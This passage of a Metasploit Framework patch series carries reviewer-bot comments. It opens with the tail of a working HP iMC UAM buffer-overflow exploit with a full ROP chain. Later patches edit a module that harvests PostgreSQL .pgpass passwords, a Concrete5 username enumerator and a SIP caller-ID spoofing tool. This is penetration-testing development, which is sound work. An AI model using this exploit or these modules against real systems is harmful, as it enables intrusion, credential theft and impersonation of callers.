[0xF7103D21].pack("N") # command id + packet << rand_text(18) + packet << [0x102].pack("n") # watchdog command type => echo reply + packet << "AAAA" # ip (static to make offset until EIP static) + packet << "AA" # port (static to make offset until EIP static) + packet << operator # Operator max length => 4066, in order to bypass packet length restriction: 4096 total + + connect_udp + udp_sock.put(packet) + disconnect_udp + end + + + def exploit + + # ROP chain generated with mona.py - See corelan.be + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + + bof = rand_text(14) + bof << rop_gadgets + bof << payload.encoded + bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length) + bof << [0x77bb0c86].pack("V") # XCHG EAX,ESI # RETN # from msvcrt.dll + bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll + bof << [junk].pack("V") # EBP + bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll + + print_status("Trying target #{target.name}...") + send_echo_reply(rand_text(20)) # something like... get up! ? + send_echo_reply(bof) # exploit + end +end From 22fbfb36013a7f4f21ab5596ea7b29df8c3085d3 Mon Sep 17 00:00:00 2001 
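Review bot: `send_echo_reply` only reaches `disconnect_udp` on the success path, so the UDP socket opened by `connect_udp` stays open if `udp_sock.put(packet)` raises. Wrapping the send keeps the cleanup unconditional: `begin; udp_sock.put(packet); ensure; disconnect_udp; end`. Separately, the description's "when using sprint in a insecure way" presumably means `sprintf` and should read "an insecure way". The helpers `junk` and `nop` also do not need the explicit `return`.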
From: jvazquez-r7 Date: Thu, 1 Nov 2012 17:38:04 +0100 Subject: [PATCH 53/64] cleanup --- modules/exploits/windows/misc/hp_imc_uam.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb index 07c7b60a9e..562af3e928 100644 --- a/modules/exploits/windows/misc/hp_imc_uam.rb +++ b/modules/exploits/windows/misc/hp_imc_uam.rb @@ -48,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2', { 'Offset' => 4035, - 'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe } ] ], @@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote bof << rop_gadgets bof << payload.encoded bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length) - bof << [0x77bb0c86].pack("V") # XCHG EAX,ESI # RETN # from msvcrt.dll + bof << [0x77bb0c86].pack("V") # EIP => XCHG EAX,ESI # RETN # from msvcrt.dll bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll bof << [junk].pack("V") # EBP bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll From b1b85bee441a0035cc25721ad4c86390920de0c4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 1 Nov 2012 14:53:18 -0500 Subject: [PATCH 54/64] Actually require PhpEXE mixin. --- modules/exploits/multi/http/auxilium_upload_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index a3190132eb..7edbbbf689 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/exploit/php_exe' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking From 1a162d7dd9abd7353cc72c0fa35ec9e0056c1d0a Mon Sep 17 00:00:00 2001 
From: sinn3r Date: Fri, 2 Nov 2012 01:15:47 -0500 Subject: [PATCH 55/64] Use Rex table, fix 1.8 syntax issues, format fixes --- modules/post/multi/gather/pgpass_creds.rb | 56 +++++++++++++++-------- 1 file changed, 36 insertions(+), 20 deletions(-) diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 8604023432..bf3d380ceb 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -1,5 +1,11 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' -require 'rex' require 'msf/core/post/file' require 'msf/core/post/common' require 'msf/core/post/unix' @@ -14,16 +20,15 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info(info, - 'Name' => 'Multi Gather pgpass Credentials', - 'Description' => %q{ + 'Name' => 'Multi Gather pgpass Credentials', + 'Description' => %q{ This module will collect the contents of user's .pgpass or pgpass.conf and - parse them for credentials. This module is largely based on firefox_creds.rb and - ssh_creds.rb. + parse them for credentials. }, - 'License' => MSF_LICENSE, - 'Author' => ['Zach Grace '], - 'Platform' => %w[linux bsd unix osx win], - 'SessionTypes' => %w[meterpreter shell] + 'License' => MSF_LICENSE, + 'Author' => ['Zach Grace '], + 'Platform' => %w[linux bsd unix osx win], + 'SessionTypes' => %w[meterpreter shell] )) end @@ -43,7 +48,7 @@ class Metasploit3 < Msf::Post grab_user_profiles.select do |user| f = "#{user['AppData']}\\postgresql\\pgpass.conf" if user['AppData'] && file?(f) - files << f + files << f end end else 
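Review bot: In the `@@ -43,7 +48,7 @@` hunk, `grab_user_profiles.select do |user|` is used only for the side effect of `files << f`, and the array that `select` builds is discarded. The re-indented line sits inside that block, so this would be the place to make the intent explicit with `grab_user_profiles.each do |user|`. The enclosing method starts and ends outside the hunk, so whether the return value of the block is used elsewhere should be confirmed before changing it.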
@@ -68,6 +73,12 @@ class Metasploit3 < Msf::Post # Store the creds to def parse_creds(f) + cred_table = Rex::Ui::Text::Table.new( + 'Header' => 'Postgres Data', + 'Indent' => 1, + 'Columns' => ['Host', 'Port', 'DB', 'User', 'Password'] + ) + read_file(f).each_line do |entry| ip, port, db, user, pass = entry.chomp.split(/:/, 5) @@ -93,21 +104,26 @@ class Metasploit3 < Msf::Post end pass = p - print_good("Retrieved postgres creds #{ip}:#{port}/#{db} #{user}:#{pass}") + cred_table << [ip, port, db, user, pass] cred_hash = { - host: session.session_host, - port: port, - user: user, - pass: pass, - ptype: "password", - sname: "postgres", - source_type: "Cred", - duplicate_ok: true, - active: true + :host => session.session_host, + :port => port, + :user => user, + :pass => pass, + :ptype => "password", + :sname => "postgres", + :source_type => "Cred", + :duplicate_ok => true, + :active => true } report_auth_info(cred_hash) end + + if not cred_table.rows.empty? + print_line + print_line(cred_table.to_s) + end end end From f3e03ddb4233ea4f4011d29fa7025dffefde6dfd Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 2 Nov 2012 16:32:34 +0100 Subject: [PATCH 56/64] Concrete5 CMS member list scanner --- .../scanner/concrete5_member_list.rb | 137 ++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 modules/auxiliary/scanner/concrete5_member_list.rb diff --git a/modules/auxiliary/scanner/concrete5_member_list.rb b/modules/auxiliary/scanner/concrete5_member_list.rb new file mode 100644 index 0000000000..70953d1773 --- /dev/null +++ b/modules/auxiliary/scanner/concrete5_member_list.rb 
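Review bot: In the `@@ -93,21 +104,26 @@` hunk the new table row records the host taken from the pgpass entry (`cred_table << [ip, port, db, user, pass]`), while `report_auth_info` files the same credential under `:host => session.session_host`. The console output and the database can therefore attribute one password to two different hosts. Whether `ip` is normalised earlier in `parse_creds` cannot be seen from the hunk. If the difference is intended, a comment such as `# table shows the host named in the file; the credential is reported against the session host` would stop it being read as a bug. The closing `if not cred_table.rows.empty?` reads better as `unless cred_table.rows.empty?`.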
@@ -0,0 +1,137 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Concrete5 Member List', + 'Version' => '$Revision$', + 'Description' => %q{ + This module extracts username information from the Concrete5 member page + }, + 'References' => + [ + # General + [ 'URL', 'http://blog.c22.cc' ] + ], + 'Author' => [ 'Chris John Riley' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(80), + OptString.new('URI', [false, 'URL of the Concrete5 root', '/']), + ], self.class) + deregister_options('RHOST') + end + + def run_host(rhost) + # check the only one forward slash appears in the url + if datastore['URI'][0,1] == "/" + url = datastore['URI'] + else + url = "/" + datastore['URI'] + end + + begin + res = send_request_cgi({ + 'uri' => "#{url}/members", + 'method' => 'GET', + 'headers' => + { + 'User-Agent' => datastore['UserAgent'] + } + }, 25) + + rescue ::Rex::ConnectionError + print_error("#{rhost}:#{rport} Unable to connect to #{url}") + return + end + + if not res + print_error("#{rhost}:#{rport} Unable to connect to #{url}") + return + end + + # extract member info from response if present + if res and res.body =~ /ccm-profile-member-username/i + extract_members(res, url) + elsif res + print_status("#{rhost}:#{rport} No members listed or profiles disabled") + else + print_error("#{rhost}:#{rport} No response received") + end + + end + + def extract_members(res, url) + + members = res.body.scan(/
(.*)<\/div>/i) + + if members + print_good("#{rhost}:#{rport} Extracted #{members.length} entries") + + # separate user data into userID, username and Profile URL + memberlist = [] + users = [] + + members.each do | mem | + userid = mem[0].scan(/\/view\/(\d+)/i) + username = mem[0].scan(/">(.+)<\/a>/i) + profile = mem[0].scan(/href="(.+)">/i) + # add all data to memberlist for table output + memberlist.push([userid[0], username[0], profile[0]]) + # add usernames to users array for reporting + users.push(username[0]) + end + + membertbl = Msf::Ui::Console::Table.new( + Msf::Ui::Console::Table::Style::Default, + 'Header' => "Concrete5 members", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' => + [ + "UserID", + "Username", + "Profile" + ]) + + memberlist.each do | mem | + membertbl << ["#{mem[0].join}", "#{mem[1].join}", "#{mem[2].join}"] + end + + # print table + print(membertbl.to_s) + + #store username to loot + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :type => "concrete5 CMS members", + :data => {:proto => "http", :users => users.join(",")}, + ) + + else + print_status("#{rhost}:#{rport} Unable to extract members") + end + end +end From 01b13480cbb8eef1d4be82ebe3894cb025233a72 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 2 Nov 2012 16:45:41 +0100 Subject: [PATCH 57/64] Added concrete5.org references --- modules/auxiliary/scanner/concrete5_member_list.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/concrete5_member_list.rb b/modules/auxiliary/scanner/concrete5_member_list.rb index 70953d1773..f52263fa55 100644 --- a/modules/auxiliary/scanner/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/concrete5_member_list.rb 
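Review bot: `String#scan` always returns an array, so `if members` in `extract_members` is always true and the `else` branch that reports "Unable to extract members" can never run. When the markup does not match, the module reports "Extracted 0 entries", prints an empty table and still writes a note with an empty user list through `report_note`. Testing the content instead fixes this: `unless members.empty?` (or `if members.any?`). The same condition is carried unchanged as context in the later hunks of this series that touch `extract_members`.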
@@ -27,7 +27,10 @@ class Metasploit4 < Msf::Auxiliary 'References' => [ # General - [ 'URL', 'http://blog.c22.cc' ] + [ 'URL', 'http://blog.c22.cc' ], + # Concrete5 + [ 'URL', 'http://www.concrete5.org'], + [ 'URL', 'http://www.concrete5.org/documentation/using-concrete5/dashboard/users-and-groups/'] ], 'Author' => [ 'Chris John Riley' ], 'License' => MSF_LICENSE From 954ccf1ca125a9fe8a8d20474b083019ca8c73a6 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 2 Nov 2012 12:54:38 +0100 Subject: [PATCH 58/64] Added ability to set extension on target --- modules/auxiliary/voip/sip_invite_spoof.rb | 26 +++++++++++++++------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 0cecb17e21..943509797c 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -1,5 +1,5 @@ ## -# $Id$ +# $Id: sip_invite_spoof.rb 15390 2012-06-05 03:03:05Z rapid7 $ ## ## @@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Invite Spoof', - 'Version' => '$Revision$', + 'Version' => '$Revision: 15390 $', 'Description' => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.', - 'Author' => 'David Maynor ', + 'Author' => '[David Maynor , ChrisJohnRiley]', 'License' => MSF_LICENSE ) @@ -32,7 +32,8 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(5060), OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']), - OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]) + OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]), + OptString.new('EXTENSION', [false, "The specific extension or name to target", nil]) ], self.class) end 
@@ -43,18 +44,27 @@ class Metasploit3 < Msf::Auxiliary name = datastore['MSG'] src = datastore['SRCADDR'] + ext = datastore['EXTENSION'] + + if not ext.nil? and not ext.empty? + # set extesion name/number + conn_string = "#{ext}@#{ip}" + else + conn_string = "#{ip}" + end + connect_udp - print_status("Sending Fake SIP Invite to: #{ip}") + print_status("Sending Fake SIP Invite to: #{conn_string}") - req = "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n" - req << "To: " + "\r\n" + req = "INVITE sip:#{conn_string} SIP/2.0" + "\r\n" + req << "To: " + "\r\n" req << "Via: SIP/2.0/UDP #{ip}" + "\r\n" req << "From: \"#{name}\"" + "\r\n" req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n" req << "CSeq: 1 INVITE" + "\r\n" req << "Max-Forwards: 20" + "\r\n" - req << "Contact: " + "\r\n\r\n" + req << "Contact: " + "\r\n\r\n" udp_sock.put(req) disconnect_udp From 891ad4685c5d327c6d9bb883f3f09a0bc06f5422 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 2 Nov 2012 13:01:20 +0100 Subject: [PATCH 59/64] $Id and $Revision --- modules/auxiliary/voip/sip_invite_spoof.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 943509797c..b95397a780 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -1,5 +1,5 @@ ## -# $Id: sip_invite_spoof.rb 15390 2012-06-05 03:03:05Z rapid7 $ +# $Id$ ## ## @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Invite Spoof', - 'Version' => '$Revision: 15390 $', + 'Version' => '$Revision$', 'Description' => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.', 'Author' => '[David Maynor , ChrisJohnRiley]', 'License' => MSF_LICENSE From 38518478bdf176e5d0d78e75348ef160e138fd83 Mon Sep 17 00:00:00 2001 
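Review bot: `if not ext.nil? and not ext.empty?` relies on the low-precedence `not`/`and` keywords, which are easy to misread and are avoided elsewhere in Ruby style guides; `if ext && !ext.empty?` states the same condition. In the `else` branch `conn_string = "#{ip}"` is a redundant interpolation and can be `conn_string = ip`. The added comment has a typo and should read `# set extension name/number`. The enclosing method begins before the hunk and ends after it.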
From: sinn3r Date: Fri, 2 Nov 2012 11:23:35 -0500 Subject: [PATCH 60/64] Format/msftidy fixes --- modules/auxiliary/voip/sip_invite_spoof.rb | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index b95397a780..ff0b9db381 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -9,10 +5,8 @@ # http://metasploit.com/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp @@ -21,9 +15,15 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Invite Spoof', - 'Version' => '$Revision$', - 'Description' => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.', - 'Author' => '[David Maynor , ChrisJohnRiley]', + 'Description' => %q{ + This module will create a fake SIP invite request making the targeted device ring + and display fake caller id information. + }, + 'Author' => + [ + 'David Maynor ', + 'ChrisJohnRiley' + ], 'License' => MSF_LICENSE ) @@ -48,9 +48,9 @@ class Metasploit3 < Msf::Auxiliary if not ext.nil? and not ext.empty? # set extesion name/number - conn_string = "#{ext}@#{ip}" + conn_string = "#{ext}@#{ip}" else - conn_string = "#{ip}" + conn_string = "#{ip}" end connect_udp From a9db59feb752820c9ff51bf48ebe5894132d44b8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 14:52:02 -0500 Subject: [PATCH 61/64] Cosmetic changes, mostly --- .../scanner/concrete5_member_list.rb | 46 +++++++++---------- 1 file changed, 22 insertions(+), 24 deletions(-) 
diff --git a/modules/auxiliary/scanner/concrete5_member_list.rb b/modules/auxiliary/scanner/concrete5_member_list.rb index f52263fa55..ef4d0d9815 100644 --- a/modules/auxiliary/scanner/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/concrete5_member_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,8 +15,7 @@ class Metasploit4 < Msf::Auxiliary def initialize super( - 'Name' => 'Concrete5 Member List', - 'Version' => '$Revision$', + 'Name' => 'Concrete5 Member List Enumeration', 'Description' => %q{ This module extracts username information from the Concrete5 member page }, @@ -39,11 +34,15 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(80), - OptString.new('URI', [false, 'URL of the Concrete5 root', '/']), + OptString.new('URI', [false, 'URL of the Concrete5 root', '/']) ], self.class) deregister_options('RHOST') end + def peer + "#{rhost}:#{rport}" + end + def run_host(rhost) # check the only one forward slash appears in the url if datastore['URI'][0,1] == "/" @@ -63,12 +62,12 @@ class Metasploit4 < Msf::Auxiliary }, 25) rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} Unable to connect to #{url}") + print_error("#{peer} Unable to connect to #{url}") return end if not res - print_error("#{rhost}:#{rport} Unable to connect to #{url}") + print_error("#{peer} Unable to connect to #{url}") return end @@ -76,19 +75,18 @@ class Metasploit4 < Msf::Auxiliary if res and res.body =~ /ccm-profile-member-username/i extract_members(res, url) elsif res - print_status("#{rhost}:#{rport} No members listed or profiles disabled") + print_status("#{peer} No members listed or profiles disabled") else - print_error("#{rhost}:#{rport} No response received") + print_error("#{peer} No response received") end end def extract_members(res, url) - members = res.body.scan(/
(.*)<\/div>/i) if members - print_good("#{rhost}:#{rport} Extracted #{members.length} entries") + print_good("#{peer} Extracted #{members.length} entries") # separate user data into userID, username and Profile URL memberlist = [] @@ -103,38 +101,38 @@ class Metasploit4 < Msf::Auxiliary # add usernames to users array for reporting users.push(username[0]) end - + membertbl = Msf::Ui::Console::Table.new( - Msf::Ui::Console::Table::Style::Default, + Msf::Ui::Console::Table::Style::Default, { 'Header' => "Concrete5 members", 'Prefix' => "\n", 'Postfix' => "\n", 'Indent' => 1, 'Columns' => [ - "UserID", - "Username", - "Profile" - ]) + "UserID", + "Username", + "Profile" + ]}) memberlist.each do | mem | membertbl << ["#{mem[0].join}", "#{mem[1].join}", "#{mem[2].join}"] end - + # print table print(membertbl.to_s) #store username to loot - report_note( + report_note({ :host => rhost, :port => rport, :proto => 'tcp', :type => "concrete5 CMS members", - :data => {:proto => "http", :users => users.join(",")}, - ) + :data => {:proto => "http", :users => users.join(",")} + }) else - print_status("#{rhost}:#{rport} Unable to extract members") + print_error("#{peer} Unable to extract members") end end end From ea5dc940d246e6daea067a897a99f29be5f0c80b Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 14:52:28 -0500 Subject: [PATCH 62/64] Move module to the correct directory --- modules/auxiliary/scanner/{ => http}/concrete5_member_list.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/{ => http}/concrete5_member_list.rb (100%) diff --git a/modules/auxiliary/scanner/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb similarity index 100% rename from modules/auxiliary/scanner/concrete5_member_list.rb rename to modules/auxiliary/scanner/http/concrete5_member_list.rb From a161c1faa06c548a0b3208ac04ffe9225107b15c Mon Sep 17 00:00:00 2001 
From: sinn3r Date: Fri, 2 Nov 2012 15:06:51 -0500 Subject: [PATCH 63/64] Final changes --- .../scanner/http/concrete5_member_list.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index ef4d0d9815..153819777b 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -52,14 +52,7 @@ class Metasploit4 < Msf::Auxiliary end begin - res = send_request_cgi({ - 'uri' => "#{url}/members", - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } - }, 25) + res = send_request_raw({'uri' => "#{url}/index.php/members"}) rescue ::Rex::ConnectionError print_error("#{peer} Unable to connect to #{url}") @@ -72,9 +65,10 @@ class Metasploit4 < Msf::Auxiliary end # extract member info from response if present - if res and res.body =~ /ccm-profile-member-username/i + if res and res.body =~ /ccm\-profile\-member\-username/i extract_members(res, url) elsif res + print_line(res.body) print_status("#{peer} No members listed or profiles disabled") else print_error("#{peer} No response received") @@ -83,7 +77,7 @@ class Metasploit4 < Msf::Auxiliary end def extract_members(res, url) - members = res.body.scan(/
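Review bot: The `print_line(res.body)` added in the `@@ -65,9 +65,10 @@` hunk writes the complete response body from the remote server to the operator's console for every host that lacks the member markup. It looks like leftover debugging. In a multi-host scan it buries the status lines, and it puts unfiltered remote content, including any control characters, straight onto the terminal and into any console log. I would drop the line, or keep it only for verbose runs as `vprint_line(res.body)`. `run_host` starts and ends outside this hunk.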
(.*)<\/div>/i) + members = res.body.scan(/
(.*)<\/div>/i) if members print_good("#{peer} Extracted #{members.length} entries") From 1d26491b77bbb37a031c34108ea587e0be7e895e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 15:09:30 -0500 Subject: [PATCH 64/64] Ok... last fix, really --- modules/auxiliary/scanner/http/concrete5_member_list.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index 153819777b..7c0cb55d3c 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -114,7 +114,7 @@ class Metasploit4 < Msf::Auxiliary end # print table - print(membertbl.to_s) + print_line(membertbl.to_s) #store username to loot report_note({